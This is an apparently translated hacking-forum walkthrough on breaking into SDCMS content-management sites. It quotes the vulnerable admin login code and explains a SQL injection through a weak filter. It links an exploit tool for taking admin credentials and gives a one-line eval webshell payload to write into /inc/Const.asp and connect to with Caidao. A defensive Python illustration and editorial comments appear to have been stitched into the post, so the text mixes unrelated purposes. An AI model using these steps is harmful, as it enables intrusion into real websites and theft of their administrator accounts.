Author: T00LS 鬼哥
Vulnerable file: (admin directory)/index.asp
Sub Check
    Dim username,password,code,getcode,Rs
    IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
    'username reaches the SQL string below with only whitespace stripped (FilterText mode 1)
    username=FilterText(Trim(Request.Form("username")),1)
    password=FilterText(Trim(Request.Form("password")),1)
    code=Trim(Request.Form("yzm"))
    getcode=Session("SDCMSCode")
    IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
    IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)":died
    IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)":died
    IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)":died
    IF username="" or password="" Then
        Echo "用户名或密码不能为空":died
    Else
        Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
        IF Rs.Eof Then
            AddLog username,GetIp,"登录失败",1
            Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
        Else
            Add_Cookies "sdcms_id",Rs(0)
            Add_Cookies "sdcms_name",username
            Add_Cookies "sdcms_pwd",Rs(2)
            Add_Cookies "sdcms_admin",Rs(3)
            Add_Cookies "sdcms_alllever",Rs(4)
            Add_Cookies "sdcms_infolever",Rs(5)
            Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
            AddLog username,GetIp,"登录成功",1
            'Automatically delete log records older than 30 days
            IF Sdcms_DataType Then
                Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
            Else
                Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
            End IF
            Go("sdcms_index.asp")
        End IF
        Rs.Close
        Set Rs=Nothing
    End IF
End Sub

We can see that username is filtered through FilterText. Let's look at the code of FilterText:

Function FilterText(ByVal t0,ByVal t1)
    IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
    t0=Trim(t0)
    Select Case t1
        Case "1"
            'Mode 1 strips whitespace only; quotes and other SQL metacharacters pass through untouched
            t0=Replace(t0,Chr(32),"")
            t0=Replace(t0,Chr(13),"")
            t0=Replace(t0,Chr(10)&Chr(10),"")
            t0=Replace(t0,Chr(10),"")
        Case "2"
            t0=Replace(t0,Chr(8),"")    'backspace
            t0=Replace(t0,Chr(9),"")    'tab (horizontal tab)
            t0=Replace(t0,Chr(10),"")   'line feed
            t0=Replace(t0,Chr(11),"")   'vertical tab
            t0=Replace(t0,Chr(12),"")   'form feed
            t0=Replace(t0,Chr(13),"")   'carriage return; chr(13)&chr(10) is the CR+LF pair
            t0=Replace(t0,Chr(22),"")
            t0=Replace(t0,Chr(32),"")   'space
            t0=Replace(t0,Chr(33),"")   '!
            t0=Replace(t0,Chr(34),"")   '"
            t0=Replace(t0,Chr(35),"")   '#
            t0=Replace(t0,Chr(36),"")   '$
            t0=Replace(t0,Chr(37),"")   '%
            t0=Replace(t0,Chr(38),"")   '&
            t0=Replace(t0,Chr(39),"")   ''
            t0=Replace(t0,Chr(40),"")   '(
            t0=Replace(t0,Chr(41),"")   ')
            t0=Replace(t0,Chr(42),"")   '*
            t0=Replace(t0,Chr(43),"")   '+
            t0=Replace(t0,Chr(44),"")   ',
            t0=Replace(t0,Chr(45),"")   '-
            t0=Replace(t0,Chr(46),"")   '.
            t0=Replace(t0,Chr(47),"")   '/
            t0=Replace(t0,Chr(58),"")   ':
            t0=Replace(t0,Chr(59),"")   ';
            t0=Replace(t0,Chr(60),"")   '<
            t0=Replace(t0,Chr(61),"")   '=
            t0=Replace(t0,Chr(62),"")   '>
            t0=Replace(t0,Chr(63),"")   '?
            t0=Replace(t0,Chr(64),"")   '@
            t0=Replace(t0,Chr(91),"")   '[
            t0=Replace(t0,Chr(92),"")   '\
            t0=Replace(t0,Chr(93),"")   ']
            t0=Replace(t0,Chr(94),"")   '^
            t0=Replace(t0,Chr(95),"")   '_
            t0=Replace(t0,Chr(96),"")   '`
            t0=Replace(t0,Chr(123),"")  '{
            t0=Replace(t0,Chr(124),"")  '|
            t0=Replace(t0,Chr(125),"")  '}
            t0=Replace(t0,Chr(126),"")  '~
        Case Else
            'HTML-entity encoding; the forum copy had decoded the entities back to the bare characters,
            'which turned these lines into no-ops, so the entities are restored here
            t0=Replace(t0, "&", "&amp;")
            t0=Replace(t0, "'", "&#39;")
            t0=Replace(t0, """", "&quot;")
            t0=Replace(t0, "<", "&lt;")
            t0=Replace(t0, ">", "&gt;")
    End Select
    IF Instr(Lcase(t0),"expression")>0 Then
        'break CSS expression() by inserting a soft hyphen (entity restored as above)
        t0=Replace(t0,"expression","e&#173;xpression", 1, -1, 0)
    End If
    FilterText=t0
End Function

See that? When the parameter is 1, it only strips these characters, so a single quote goes straight into the SQL string:
    t0=Replace(t0,Chr(32),"")
    t0=Replace(t0,Chr(13),"")
    t0=Replace(t0,Chr(10)&Chr(10),"")
    t0=Replace(t0,Chr(10),"")
This vulnerability makes it possible to grab the admin account and password directly. SDCMS's default admin path is /admin/; if the site owner changed the admin path, you will have to find it yourself!
Exploit tool download (this tool only runs on XP): sdcms-EXP
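As an added defensive illustration (not SDCMS code), the following Python models FilterText modes 1 and 2 from the listing above and contrasts the concatenated login query from Sub Check with a parameterized one. The Sd_Admin table, the O'Brien account and its password are constructed here in an in-memory SQLite database; the column names are taken from the page. It shows that mode 1 lets an apostrophe reach the SQL parser while a bound parameter handles the same input correctly.

```python
import hashlib
import sqlite3

# Character codes stripped by FilterText, transcribed from the ASP function above.
_MODE1 = {10, 13, 32}                                   # Case "1": whitespace only
_MODE2 = (set(range(8, 14)) | {22} | set(range(32, 48)) | set(range(58, 65))
          | set(range(91, 97)) | set(range(123, 127)))  # Case "2": whitespace + punctuation


def filter_text(t0, t1):
    """Python model of FilterText; t1 is "1" or "2" as in the ASP code."""
    if not t0:
        return ""
    drop = _MODE1 if t1 == "1" else _MODE2
    return "".join(ch for ch in t0.strip() if ord(ch) not in drop)


def concat_query(username, password):
    """Rebuilds the login SQL the way Sub Check does: by string concatenation."""
    pwd_hash = hashlib.md5(password.encode()).hexdigest()
    return ("Select Id,Sdcms_Name From Sd_Admin Where Sdcms_Name='" + username
            + "' And Sdcms_Pwd='" + pwd_hash + "'")


def make_db():
    """Constructed in-memory stand-in for Sd_Admin (column names from the page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("Create Table Sd_Admin(Id Integer, Sdcms_Name Text, Sdcms_Pwd Text)")
    # Constructed account whose name legitimately contains an apostrophe.
    conn.execute("Insert Into Sd_Admin Values(1,'O''Brien',?)",
                 (hashlib.md5(b"s3cret").hexdigest(),))
    return conn


def login_concat(conn, username, password):
    """Vulnerable path: FilterText mode 1, then concatenation. Returns (row, error)."""
    try:
        sql = concat_query(filter_text(username, "1"), password)
        return conn.execute(sql).fetchone(), None
    except sqlite3.OperationalError as exc:
        # The apostrophe survived mode 1 and was parsed as SQL syntax, not data.
        return None, str(exc)


def login_param(conn, username, password):
    """Hardened path: the same lookup with bound parameters (ADODB.Command in ASP)."""
    pwd_hash = hashlib.md5(password.encode()).hexdigest()
    return conn.execute(
        "Select Id,Sdcms_Name From Sd_Admin Where Sdcms_Name=? And Sdcms_Pwd=?",
        (username, pwd_hash)).fetchone()
```

A syntax error on a legitimate apostrophe is the cheapest proof that user input is being parsed as SQL; the parameterized form removes that path regardless of what FilterText strips.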

Test:

Now enter the captcha shown in the tool and click OK.

See, we went straight into the admin management interface, heh!

Straight into the back end like that....

SDCMS privilege escalation:

Method 1: visit /(admin directory)/sdcms_set.asp and append “:eval(request(Chr(63)))’ after the site name (网站名称); that writes a one-line shell directly. It gets written into /inc/Const.asp, and the one-liner's connection password is ?

OK, now connect with Caidao (菜刀)!